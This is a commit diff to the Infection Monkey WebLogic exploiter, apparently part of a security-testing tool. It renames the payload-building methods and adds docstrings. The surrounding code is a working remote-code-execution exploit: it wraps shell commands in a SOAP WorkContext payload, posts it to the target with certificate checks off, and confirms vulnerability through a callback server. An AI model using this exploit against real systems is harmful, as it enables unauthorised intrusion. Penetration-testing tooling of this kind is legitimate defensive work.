Documented what's required and other minor changes

2018-08-28 22:37:07 +03:00 · 2018-08-28 22:37:07 +03:00 · 57e795573e
parent 307a7c396c
commit 57e795573e
1 changed files with 22 additions and 8 deletions
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@ -56,9 +56,9 @@ class WebLogicExploiter(WebRCE):

    def exploit(self, url, command):
        if 'linux' in self.host.os['type']:
-            payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
+            payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
        else:
-            payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
+            payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
        try:
            post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
        except Exception as e:
@ -99,12 +99,11 @@ class WebLogicExploiter(WebRCE):

        def stop(self):
            self._stopped = True
-            return

    def check_if_exploitable(self, url):
        # Server might get response faster than it starts listening to it, we need a lock
        httpd, lock = self._start_http_server()
-        payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
+        payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
        try:
            post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
        except exceptions.ReadTimeout:
@ -116,6 +115,10 @@ class WebLogicExploiter(WebRCE):
        return httpd.get_requests > 0

    def _start_http_server(self):
+        """
+        Starts custom http server that waits for GET requests
+        :return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock)
+        """
        lock = threading.Lock()
        local_port = get_free_tcp_port()
        local_ip = get_interface_to_target(self.host.ip_addr)
@ -129,11 +132,16 @@ class WebLogicExploiter(WebRCE):
        lock.release()
        httpd.join(SERVER_TIMEOUT)
        httpd.stop()
-        return True
-

    @staticmethod
-    def exploit_payload(cmd_base, cmd_opt, command):
+    def get_exploit_payload(cmd_base, cmd_opt, command):
+        """
+        Formats the payload used in exploiting weblogic servers
+        :param cmd_base: What command prompt to use eg. cmd
+        :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
+        :param command: command itself
+        :return: Formatted payload
+        """
        empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                  <soapenv:Header>
                    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
@ -162,7 +170,13 @@ class WebLogicExploiter(WebRCE):
        return payload

    @staticmethod
-    def test_payload(ip, port):
+    def get_test_payload(ip, port):
+        """
+        Gets payload used for testing whether weblogic server is vulnerable
+        :param ip: Server's IP
+        :param port: Server's port
+        :return: Formatted payload
+        """
        generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                  <soapenv:Header>
                    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">